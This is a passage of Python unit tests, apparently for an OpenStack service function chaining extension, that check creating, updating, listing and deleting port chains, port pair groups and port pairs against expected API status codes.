def test_update_port_chain_replace_port_pair_groups(self):
with self.port_pair_group(
port_pair_group={}
) as pg1, self.port_pair_group(
port_pair_group={}
) as pg2:
with self.port_chain(port_chain={
'port_pair_groups': [pg1['port_pair_group']['id']],
}) as pc:
updates = {
'port_pair_groups': [pg2['port_pair_group']['id']]
}
req = self.new_update_request(
'port_chains', {'port_chain': updates},
pc['port_chain']['id']
)
res = self.deserialize(
self.fmt,
req.get_response(self.ext_api)
)
expected = pc['port_chain']
expected.update(updates)
self._assert_port_chain_equal(res['port_chain'], expected)
req = self.new_show_request(
'port_chains', pc['port_chain']['id']
)
res = self.deserialize(
self.fmt, req.get_response(self.ext_api)
)
self._assert_port_chain_equal(res['port_chain'], expected)
def test_update_port_chain_chain_parameters(self):
with self.port_pair_group(
port_pair_group={}
) as pg:
with self.port_chain(port_chain={
'port_pair_groups': [pg['port_pair_group']['id']],
}) as pc:
updates = {
'chain_parameters': {'correlation': 'mpls'}
}
req = self.new_update_request(
'port_chains', {'port_chain': updates},
pc['port_chain']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(400, res.status_int)
def test_update_port_chain_part_of_graph_fail(self):
with self.port_pair_group(
port_pair_group={}
) as pg1, self.port_pair_group(
port_pair_group={}
) as pg2:
with self.port_chain(port_chain={
'port_pair_groups': [pg1['port_pair_group']['id']]
}) as pc1, self.port_chain(port_chain={
'port_pair_groups': [pg2['port_pair_group']['id']]
}) as pc2:
with self.service_graph(service_graph={
'name': 'test1',
'port_chains': {
pc1['port_chain']['id']: [pc2['port_chain']['id']]}
}):
updates = {
'port_pair_groups': [uuidutils.generate_uuid()]
}
req = self.new_update_request(
'port_chains', {'port_chain': updates},
pc1['port_chain']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(409, res.status_int)
updates = {
'flow_classifiers': [uuidutils.generate_uuid()]
}
req = self.new_update_request(
'port_chains', {'port_chain': updates},
pc2['port_chain']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(409, res.status_int)
updates = {
'name': 'new name',
'description': 'new description'
}
req = self.new_update_request(
'port_chains', {'port_chain': updates},
pc1['port_chain']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(200, res.status_int)
def test_update_port_chain_consistency_with_consecutive_tap_ppg(self):
with self.port(
name='port1',
device_id='tap_device1'
) as tap_port1, self.port(
name='port2',
device_id='tap_device2'
) as tap_port2:
with self.port_pair(
port_pair={
'ingress': tap_port1['port']['id'],
'egress': tap_port1['port']['id']
}
) as tap_pp1, self.port_pair(
port_pair={
'ingress': tap_port2['port']['id'],
'egress': tap_port2['port']['id']
}
) as tap_pp2:
with self.port_pair_group(
self.fmt,
{
'port_pairs': [tap_pp1['port_pair']['id']],
'tap_enabled': True
}
) as pg1, self.port_pair_group(
self.fmt,
{
'port_pairs': [tap_pp2['port_pair']['id']],
'tap_enabled': True
}
) as pg2:
with self.port_chain(
port_chain={
'port_pair_groups': [
pg1['port_pair_group']['id']
]
}
) as pc:
updates = {
'port_pair_groups': [
pg1['port_pair_group']['id'],
pg2['port_pair_group']['id']
]
}
req = self.new_update_request(
'port_chains', {'port_chain': updates},
pc['port_chain']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(400, res.status_int)
def test_update_tap_port_chain_consistency(self):
with self.port(
name='port1',
device_id='tap_device1'
) as tap_port1, self.port(
name='port2',
device_id='tap_device2'
) as tap_port2:
with self.port_pair(
port_pair={
'ingress': tap_port1['port']['id'],
'egress': tap_port1['port']['id']
}
) as tap_pp1, self.port_pair(
port_pair={
'ingress': tap_port2['port']['id'],
'egress': tap_port2['port']['id']
}
) as tap_pp2:
with self.port_pair_group(
self.fmt,
{
'port_pairs': [tap_pp1['port_pair']['id']],
'tap_enabled': True
}
) as pg1, self.port_pair_group(
self.fmt,
{
'port_pairs': [tap_pp2['port_pair']['id']],
'tap_enabled': False
}
) as pg2:
with self.port_chain(
port_chain={
'port_pair_groups': [
pg1['port_pair_group']['id']
]
}
) as pc:
updates = {
'port_pair_groups': [
pg1['port_pair_group']['id'],
pg2['port_pair_group']['id']
]
}
req = self.new_update_request(
'port_chains', {'port_chain': updates},
pc['port_chain']['id']
)
resp = req.get_response(self.ext_api)
self.assertEqual(200, resp.status_int)
res = self.deserialize(self.fmt, resp)
expected = pc['port_chain']
expected.update(updates)
self._assert_port_chain_equal(res['port_chain'],
expected)
def test_delete_port_chain(self):
with self.port_pair_group(
port_pair_group={}
) as pg:
with self.port_chain(port_chain={
'port_pair_groups': [pg['port_pair_group']['id']]
}, do_delete=False) as pc:
req = self.new_delete_request(
'port_chains', pc['port_chain']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(204, res.status_int)
req = self.new_show_request(
'port_chains', pc['port_chain']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(404, res.status_int)
req = self.new_show_request(
'port_pair_groups', pg['port_pair_group']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(200, res.status_int)
def test_delete_port_chain_noexist(self):
req = self.new_delete_request(
'port_chains', '1'
)
res = req.get_response(self.ext_api)
self.assertEqual(404, res.status_int)
def test_delete_port_chain_part_of_graph_fail(self):
with self.port_pair_group(
port_pair_group={}
) as pg1, self.port_pair_group(
port_pair_group={}
) as pg2:
with self.port_chain(port_chain={
'port_pair_groups': [pg1['port_pair_group']['id']]
}) as pc1, self.port_chain(port_chain={
'port_pair_groups': [pg2['port_pair_group']['id']]
}) as pc2:
with self.service_graph(service_graph={
'name': 'test1',
'port_chains': {
pc1['port_chain']['id']: [pc2['port_chain']['id']]}
}):
req = self.new_delete_request(
'port_chains', pc1['port_chain']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(409, res.status_int)
req = self.new_delete_request(
'port_chains', pc2['port_chain']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(409, res.status_int)
def test_delete_flow_classifier_port_chain_exist(self):
with self.port(
name='test1'
) as port:
with self.flow_classifier(flow_classifier={
'logical_source_port': port['port']['id']
}) as fc:
with self.port_pair_group(port_pair_group={
}) as pg:
with self.port_chain(port_chain={
'port_pair_groups': [pg['port_pair_group']['id']],
'flow_classifiers': [fc['flow_classifier']['id']]
}):
req = self.new_delete_request(
'flow_classifiers', fc['flow_classifier']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(409, res.status_int)
def test_create_port_pair_group(self):
self._test_create_port_pair_group({})
def test_quota_create_port_pair_group_quota(self):
cfg.CONF.set_override('quota_port_pair_group', 3, group='QUOTAS')
self._create_port_pair_group(
self.fmt, {'port_pairs': []}, expected_res_status=201
)
self._create_port_pair_group(
self.fmt, {'port_pairs': []}, expected_res_status=201
)
self._create_port_pair_group(
self.fmt, {'port_pairs': []}, expected_res_status=201
)
self._create_port_pair_group(
self.fmt, {'port_pairs': []}, expected_res_status=409
)
def test_create_port_pair_group_all_fields(self):
self._test_create_port_pair_group({
'name': 'test1',
'description': 'desc1',
'port_pairs': [],
'tap_enabled': False,
'port_pair_group_parameters': {
'lb_fields': ['ip_src', 'ip_dst'],
'ppg_n_tuple_mapping': {
'ingress_n_tuple': {'source_ip_prefix': None},
'egress_n_tuple': {'destination_ip_prefix': None}}
}
})
def test_create_port_pair_group_with_empty_parameters(self):
self._test_create_port_pair_group({
'name': 'test1',
'description': 'desc1',
'port_pairs': [],
'port_pair_group_parameters': {}
})
def test_create_port_pair_group_with_none_parameters(self):
self._test_create_port_pair_group({
'name': 'test1',
'description': 'desc1',
'port_pairs': [],
'port_pair_group_parameters': None
})
def test_create_port_pair_group_with_default_parameters(self):
self._test_create_port_pair_group({
'name': 'test1',
'description': 'desc1',
'port_pairs': [],
'tap_enabled': False,
'port_pair_group_parameters': {
'lb_fields': [],
'ppg_n_tuple_mapping': {}
}
})
def test_create_port_pair_group_with_tap_enabled_parameter_true(self):
self._test_create_port_pair_group(
{
'name': 'test1',
'description': 'desc1',
'port_pairs': [],
'tap_enabled': True,
'port_pair_group_parameters': {}
},
expected_port_pair_group={
'name': 'test1',
'description': 'desc1',
'port_pairs': [],
'tap_enabled': True,
'port_pair_group_parameters': {
'lb_fields': [],
'ppg_n_tuple_mapping': {u'egress_n_tuple': {},
u'ingress_n_tuple': {}},
}
}
)
def test_create_ppg_with_all_params_and_tap_enabled_parameter_true(self):
self._create_port_pair_group(
self.fmt,
{
'name': 'test1',
'description': 'desc1',
'port_pairs': [],
'tap_enabled': True,
'port_pair_group_parameters': {
'lb_fields': ['ip_src', 'ip_dst'],
'ppg_n_tuple_mapping': {
'ingress_n_tuple': {'source_ip_prefix': None},
'egress_n_tuple': {'destination_ip_prefix': None}}
}
})
def test_create_port_pair_group_with_port_pairs(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
}) as pp1, self.port_pair(port_pair={
'ingress': dst_port['port']['id'],
'egress': src_port['port']['id']
}) as pp2:
self._test_create_port_pair_group({
'port_pairs': [
pp1['port_pair']['id'],
pp2['port_pair']['id']
]
})
def test_create_tap_port_pair_group_with_single_port_pair(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
}) as pp1:
self._test_create_port_pair_group(
{
'port_pairs': [
pp1['port_pair']['id'],
],
'tap_enabled': True
}
)
def test_create_tap_pair_group_with_multiple_port_pairs(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
}) as pp1, self.port_pair(port_pair={
'ingress': dst_port['port']['id'],
'egress': src_port['port']['id']
}) as pp2:
self._create_port_pair_group(
self.fmt,
{
'port_pairs': [
pp1['port_pair']['id'],
pp2['port_pair']['id']
],
'tap_enabled': True
},
expected_res_status=400
)
def test_create_port_pair_group_consistent_correlations(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id'],
'service_function_parameters': {'correlation': 'mpls'}
}) as pp1, self.port_pair(port_pair={
'ingress': dst_port['port']['id'],
'egress': src_port['port']['id'],
'service_function_parameters': {'correlation': 'mpls'}
}) as pp2:
self._test_create_port_pair_group({
'port_pairs': [
pp1['port_pair']['id'],
pp2['port_pair']['id']
]
})
def test_create_port_pair_group_inconsistent_correlations(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id'],
'service_function_parameters': {'correlation': 'mpls'}
}) as pp1, self.port_pair(port_pair={
'ingress': dst_port['port']['id'],
'egress': src_port['port']['id'],
'service_function_parameters': {'correlation': None}
}) as pp2:
self._create_port_pair_group(
self.fmt,
{'port_pairs': [
pp1['port_pair']['id'],
pp2['port_pair']['id']
]},
expected_res_status=400)
def test_create_port_pair_group_with_nouuid_port_pair_id(self):
self._create_port_pair_group(
self.fmt, {'port_pairs': ['unknown']},
expected_res_status=400
)
def test_create_port_pair_group_with_unknown_port_pair_id(self):
self._create_port_pair_group(
self.fmt, {'port_pairs': [uuidutils.generate_uuid()]},
expected_res_status=404
)
def test_create_port_pair_group_share_port_pair_id(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
}) as pp:
with self.port_pair_group(port_pair_group={
'port_pairs': [pp['port_pair']['id']]
}):
self._create_port_pair_group(
self.fmt, {'port_pairs': [pp['port_pair']['id']]},
expected_res_status=409
)
def test_list_port_pair_groups(self):
with self.port_pair_group(port_pair_group={
'name': 'test1'
}) as pc1, self.port_pair_group(port_pair_group={
'name': 'test2'
}) as pc2:
port_pair_groups = [pc1, pc2]
self._test_list_resources(
'port_pair_group', port_pair_groups
)
def test_list_port_pair_groups_with_params(self):
with self.port_pair_group(port_pair_group={
'name': 'test1'
}) as pc1, self.port_pair_group(port_pair_group={
'name': 'test2'
}) as pc2:
self._test_list_resources(
'port_pair_group', [pc1],
query_params='name=test1'
)
self._test_list_resources(
'port_pair_group', [pc2],
query_params='name=test2'
)
self._test_list_resources(
'port_pair_group', [],
query_params='name=test3'
)
def test_list_port_pair_groups_with_unknown_params(self):
with self.port_pair_group(port_pair_group={
'name': 'test1'
}) as pc1, self.port_pair_group(port_pair_group={
'name': 'test2'
}) as pc2:
self._test_list_resources(
'port_pair_group', [pc1, pc2],
query_params='hello=test3'
)
def test_show_port_pair_group(self):
with self.port_pair_group(port_pair_group={
'name': 'test1'
}) as pc:
req = self.new_show_request(
'port_pair_groups', pc['port_pair_group']['id']
)
res = self.deserialize(
self.fmt, req.get_response(self.ext_api)
)
for k, v in pc['port_pair_group'].items():
self.assertEqual(res['port_pair_group'][k], v)
def test_show_port_pair_group_noexist(self):
req = self.new_show_request(
'port_pair_groups', '1'
)
res = req.get_response(self.ext_api)
self.assertEqual(404, res.status_int)
def test_update_port_pair_group(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
}) as pp1, self.port_pair(port_pair={
'ingress': dst_port['port']['id'],
'egress': src_port['port']['id']
}) as pp2:
with self.port_pair_group(port_pair_group={
'name': 'test1',
'description': 'desc1',
'port_pairs': [pp1['port_pair']['id']]
}) as pg:
updates = {
'name': 'test2',
'description': 'desc2',
'port_pairs': [pp2['port_pair']['id']]
}
req = self.new_update_request(
'port_pair_groups', {'port_pair_group': updates},
pg['port_pair_group']['id']
)
res = self.deserialize(
self.fmt,
req.get_response(self.ext_api)
)
expected = pg['port_pair_group']
expected.update(updates)
for k, v in expected.items():
self.assertEqual(res['port_pair_group'][k], v)
req = self.new_show_request(
'port_pair_groups', pg['port_pair_group']['id']
)
res = self.deserialize(
self.fmt, req.get_response(self.ext_api)
)
for k, v in expected.items():
self.assertEqual(res['port_pair_group'][k], v)
def test_update_port_pair_group_consistency_checks(self):
with self.port(
name='port1',
device_id='default'
) as port1, self.port(
name='port2',
device_id='default'
) as port2, self.port(
name='port3',
device_id='default'
) as port3, self.port(
name='port4',
device_id='default'
) as port4:
with self.port_pair(port_pair={
'ingress': port1['port']['id'],
'egress': port2['port']['id'],
'service_function_parameters': {'correlation': 'mpls'}
}) as pp1, self.port_pair(port_pair={
'ingress': port2['port']['id'],
'egress': port3['port']['id'],
'service_function_parameters': {'correlation': 'mpls'}
}) as pp2, self.port_pair(port_pair={
'ingress': port3['port']['id'],
'egress': port4['port']['id'],
'service_function_parameters': {'correlation': None}
}) as pp3, self.port_pair(port_pair={
'ingress': port4['port']['id'],
'egress': port1['port']['id'],
'service_function_parameters': {'correlation': 'mpls'}
}) as pp4:
with self.port_pair_group(port_pair_group={
'name': 'test1',
'description': 'desc1',
'port_pairs': [pp1['port_pair']['id'],
pp2['port_pair']['id']]
}) as pg:
updates = {
'name': 'test2',
'description': 'desc2',
'port_pairs': [pp1['port_pair']['id'],
pp2['port_pair']['id'],
pp3['port_pair']['id']]
}
req = self.new_update_request(
'port_pair_groups', {'port_pair_group': updates},
pg['port_pair_group']['id']
)
resp = req.get_response(self.ext_api)
self.assertEqual(400, resp.status_int)
updates = {
'name': 'test3',
'description': 'desc3',
'port_pairs': [pp1['port_pair']['id'],
pp2['port_pair']['id'],
pp4['port_pair']['id']]
}
req = self.new_update_request(
'port_pair_groups', {'port_pair_group': updates},
pg['port_pair_group']['id']
)
resp = req.get_response(self.ext_api)
res = self.deserialize(self.fmt, resp)
expected = pg['port_pair_group']
expected.update(updates)
for k, v in expected.items():
self.assertEqual(res['port_pair_group'][k], v)
req = self.new_show_request(
'port_pair_groups', pg['port_pair_group']['id']
)
res = self.deserialize(
self.fmt, req.get_response(self.ext_api)
)
for k, v in expected.items():
self.assertEqual(res['port_pair_group'][k], v)
def test_update_tap_port_pair_group_consistency(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
}) as pp1, self.port_pair(port_pair={
'ingress': dst_port['port']['id'],
'egress': src_port['port']['id']
}) as pp2:
with self.port_pair_group(port_pair_group={
'name': 'test1',
'description': 'desc1',
'port_pairs': [pp1['port_pair']['id']],
}) as pg:
updates = {
'name': 'test2',
'description': 'desc2',
'port_pairs': [pp1['port_pair']['id'],
pp2['port_pair']['id']],
'tap_enabled': True
}
req = self.new_update_request(
'port_pair_groups', {'port_pair_group': updates},
pg['port_pair_group']['id']
)
resp = req.get_response(self.ext_api)
self.assertEqual(400, resp.status_int)
def test_delete_port_pair_group(self):
with self.port_pair_group(port_pair_group={
'name': 'test1'
}, do_delete=False) as pc:
req = self.new_delete_request(
'port_pair_groups', pc['port_pair_group']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(204, res.status_int)
req = self.new_show_request(
'port_pair_groups', pc['port_pair_group']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(404, res.status_int)
def test_delete_port_pair_group_port_chain_exist(self):
with self.port_pair_group(port_pair_group={
'name': 'test1'
}) as pg:
with self.port_chain(port_chain={
'port_pair_groups': [pg['port_pair_group']['id']]
}):
req = self.new_delete_request(
'port_pair_groups', pg['port_pair_group']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(409, res.status_int)
def test_delete_port_pair_group_noexist(self):
req = self.new_delete_request(
'port_pair_groups', '1'
)
res = req.get_response(self.ext_api)
self.assertEqual(404, res.status_int)
def test_create_port_pair(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
self._test_create_port_pair({
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
})
def test_quota_create_port_pair_quota(self):
cfg.CONF.set_override('quota_port_pair', 3, group='QUOTAS')
with self.port(
name='port1',
device_id='default'
) as src_port1, self.port(
name='port2',
device_id='default'
) as dst_port1, self.port(
name='port3',
device_id='default'
) as src_port2, self.port(
name='port4',
device_id='default'
) as dst_port2, self.port(
name='port5',
device_id='default'
) as src_port3, self.port(
name='port6',
device_id='default'
) as dst_port3, self.port(
name='port7',
device_id='default'
) as src_port4, self.port(
name='port8',
device_id='default'
) as dst_port4:
self._create_port_pair(
self.fmt, {
'ingress': src_port1['port']['id'],
'egress': dst_port1['port']['id']
}, expected_res_status=201)
self._create_port_pair(
self.fmt, {
'ingress': src_port2['port']['id'],
'egress': dst_port2['port']['id']
}, expected_res_status=201)
self._create_port_pair(
self.fmt, {
'ingress': src_port3['port']['id'],
'egress': dst_port3['port']['id']
}, expected_res_status=201)
self._create_port_pair(
self.fmt, {
'ingress': src_port4['port']['id'],
'egress': dst_port4['port']['id']
}, expected_res_status=409)
def test_create_port_pair_all_fields(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
self._test_create_port_pair({
'name': 'test1',
'description': 'desc1',
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id'],
'service_function_parameters': {
'correlation': None, 'weight': 2}
})
def test_create_port_pair_none_service_function_parameters(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
self._test_create_port_pair({
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id'],
'service_function_parameters': None
})
def test_create_port_pair_empty_service_function_parameters(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
self._test_create_port_pair({
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id'],
'service_function_parameters': {}
})
def test_create_port_pair_with_src_dst_same_port(self):
with self.port(
name='port1',
device_id='default'
) as src_dst_port:
self._test_create_port_pair({
'ingress': src_dst_port['port']['id'],
'egress': src_dst_port['port']['id']
})
def test_create_port_pair_empty_input(self):
self._create_port_pair(self.fmt, {}, expected_res_status=400)
def test_create_port_pair_with_no_ingress(self):
with self.port(
name='port1',
device_id='default'
) as dst_port:
self._create_port_pair(
self.fmt,
{
'egress': dst_port['port']['id']
},
expected_res_status=400
)
def test_create_port_pair_with_no_egress(self):
with self.port(
name='port1',
device_id='default'
) as src_port:
self._create_port_pair(
self.fmt,
{
'ingress': src_port['port']['id']
},
expected_res_status=400
)
def test_create_port_pair_with_nouuid_ingress(self):
with self.port(
name='port1',
device_id='default'
) as dst_port:
self._create_port_pair(
self.fmt,
{
'ingress': '1',
'egress': dst_port['port']['id']
},
expected_res_status=400
)
def test_create_port_pair_with_unknown_ingress(self):
with self.port(
name='port1',
device_id='default'
) as dst_port:
self._create_port_pair(
self.fmt,
{
'ingress': uuidutils.generate_uuid(),
'egress': dst_port['port']['id']
},
expected_res_status=404
)
def test_create_port_pair_with_nouuid_egress(self):
with self.port(
name='port1',
device_id='default'
) as src_port:
self._create_port_pair(
self.fmt,
{
'ingress': src_port['port']['id'],
'egress': '1'
},
expected_res_status=400
)
def test_create_port_pair_with_unknown_egress(self):
with self.port(
name='port1',
device_id='default'
) as src_port:
self._create_port_pair(
self.fmt,
{
'ingress': src_port['port']['id'],
'egress': uuidutils.generate_uuid()
},
expected_res_status=404
)
def test_create_port_pair_ingress_egress_different_hosts(self):
with self.port(
name='port1',
device_id='device1'
) as src_port, self.port(
name='port2',
device_id='device2'
) as dst_port:
self._create_port_pair(
self.fmt,
{
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
},
expected_res_status=400
)
def test_create_port_pair_with_invalid_service_function_parameters(self):
with self.port(
name='port1',
device_id='default'
) as src_dst_port:
self._create_port_pair(
self.fmt,
{
'ingress': src_dst_port['port']['id'],
'egress': src_dst_port['port']['id'],
'service_function_parameters': {'abc': 'def'}
},
expected_res_status=400
)
def test_create_port_pair_with_invalid_correlation(self):
with self.port(
name='port1',
device_id='default'
) as src_dst_port:
self._create_port_pair(
self.fmt,
{
'ingress': src_dst_port['port']['id'],
'egress': src_dst_port['port']['id'],
'service_function_parameters': {'correlation': 'def'}
},
expected_res_status=400
)
def test_create_port_pair_with_invalid_weight(self):
with self.port(
name='port1',
device_id='default'
) as src_dst_port:
self._create_port_pair(
self.fmt,
{
'ingress': src_dst_port['port']['id'],
'egress': src_dst_port['port']['id'],
'service_function_parameters': {'weight': -1}
},
expected_res_status=400
)
def test_list_port_pairs(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
}) as pc1, self.port_pair(port_pair={
'ingress': dst_port['port']['id'],
'egress': src_port['port']['id']
}) as pc2:
port_pairs = [pc1, pc2]
self._test_list_resources(
'port_pair', port_pairs
)
def test_list_port_pairs_with_params(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'name': 'test1',
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
}) as pc1, self.port_pair(port_pair={
'name': 'test2',
'ingress': dst_port['port']['id'],
'egress': src_port['port']['id']
}) as pc2:
self._test_list_resources(
'port_pair', [pc1],
query_params='name=test1'
)
self._test_list_resources(
'port_pair', [pc2],
query_params='name=test2'
)
self._test_list_resources(
'port_pair', [],
query_params='name=test3'
)
def test_list_port_pairs_with_unknown_params(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'name': 'test1',
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
}) as pc1, self.port_pair(port_pair={
'name': 'test2',
'ingress': dst_port['port']['id'],
'egress': src_port['port']['id']
}) as pc2:
port_pairs = [pc1, pc2]
self._test_list_resources(
'port_pair', port_pairs,
query_params='hello=test3'
)
def test_show_port_pair(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
}) as pc:
req = self.new_show_request(
'port_pairs', pc['port_pair']['id']
)
res = self.deserialize(
self.fmt, req.get_response(self.ext_api)
)
for k, v in pc['port_pair'].items():
self.assertEqual(res['port_pair'][k], v)
def test_show_port_pair_noexist(self):
req = self.new_show_request(
'port_pairs', '1'
)
res = req.get_response(self.ext_api)
self.assertEqual(404, res.status_int)
def test_update_port_pair(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'name': 'test1',
'description': 'desc1',
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
}) as pc:
updates = {
'name': 'test2',
'description': 'desc2'
}
req = self.new_update_request(
'port_pairs', {'port_pair': updates},
pc['port_pair']['id']
)
res = self.deserialize(
self.fmt,
req.get_response(self.ext_api)
)
expected = pc['port_pair']
expected.update(updates)
for k, v in expected.items():
self.assertEqual(res['port_pair'][k], v)
req = self.new_show_request(
'port_pairs', pc['port_pair']['id']
)
res = self.deserialize(
self.fmt, req.get_response(self.ext_api)
)
for k, v in expected.items():
self.assertEqual(res['port_pair'][k], v)
def test_update_port_pair_service_function_parameters(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'name': 'test1',
'description': 'desc1',
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
}) as pc:
updates = {
'service_function_parameters': {
'correlation': None, 'weight': 2,
}
}
req = self.new_update_request(
'port_pairs', {'port_pair': updates},
pc['port_pair']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(400, res.status_int)
def test_update_port_pair_ingress(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'name': 'test1',
'description': 'desc1',
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
}) as pc:
updates = {
'ingress': dst_port['port']['id']
}
req = self.new_update_request(
'port_pairs', {'port_pair': updates},
pc['port_pair']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(400, res.status_int)
def test_update_port_pair_egress(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'name': 'test1',
'description': 'desc1',
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
}) as pc:
updates = {
'egress': src_port['port']['id']
}
req = self.new_update_request(
'port_pairs', {'port_pair': updates},
pc['port_pair']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(400, res.status_int)
def test_delete_port_pair(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
}, do_delete=False) as pc:
req = self.new_delete_request(
'port_pairs', pc['port_pair']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(204, res.status_int)
req = self.new_show_request(
'port_pairs', pc['port_pair']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(404, res.status_int)
def test_delete_port_pair_noexist(self):
req = self.new_delete_request(
'port_pairs', '1'
)
res = req.get_response(self.ext_api)
self.assertEqual(404, res.status_int)
def test_delete_port_pair_port_pair_group_exist(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
}) as pp:
with self.port_pair_group(port_pair_group={
'port_pairs': [pp['port_pair']['id']]
}):
req = self.new_delete_request(
'port_pairs', pp['port_pair']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(409, res.status_int)
def test_delete_ingress_port_pair_exist(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
}):
req = self.new_delete_request(
'ports', src_port['port']['id']
)
res = req.get_response(self.api)
self.assertEqual(500, res.status_int)
def test_delete_egress_port_pair_exist(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
}):
req = self.new_delete_request(
'ports', dst_port['port']['id']
)
res = req.get_response(self.api)
self.assertEqual(500, res.status_int)
def _test_create_service_graph_branching_ppg(
self, src_corr, dst_corr, status):
with self.port(
name='port1',
device_id='default'
) as port1, self.port(
name='port2',
device_id='default'
) as port2, self.port(
name='port3',
device_id='default'
) as port3, self.port(
name='port4',
device_id='default'
) as port4:
with self.port_pair(port_pair={
'ingress': port1['port']['id'],
'egress': port1['port']['id'],
'service_function_parameters': {'correlation': 'mpls'}
}, do_delete=False) as pp1, self.port_pair(port_pair={
'ingress': port2['port']['id'],
'egress': port2['port']['id'],
'service_function_parameters': {'correlation': src_corr}
}, do_delete=False) as pp2, self.port_pair(port_pair={
'ingress': port3['port']['id'],
'egress': port3['port']['id'],
'service_function_parameters': {'correlation': dst_corr}
}, do_delete=False) as pp3, self.port_pair(port_pair={
'ingress': port4['port']['id'],
'egress': port4['port']['id'],
'service_function_parameters': {'correlation': 'mpls'}
}, do_delete=False) as pp4:
with self.port_pair_group(
port_pair_group={'port_pairs': [pp1['port_pair']['id']]},
do_delete=False
) as pg1, self.port_pair_group(
port_pair_group={'port_pairs': [pp2['port_pair']['id']]},
do_delete=False
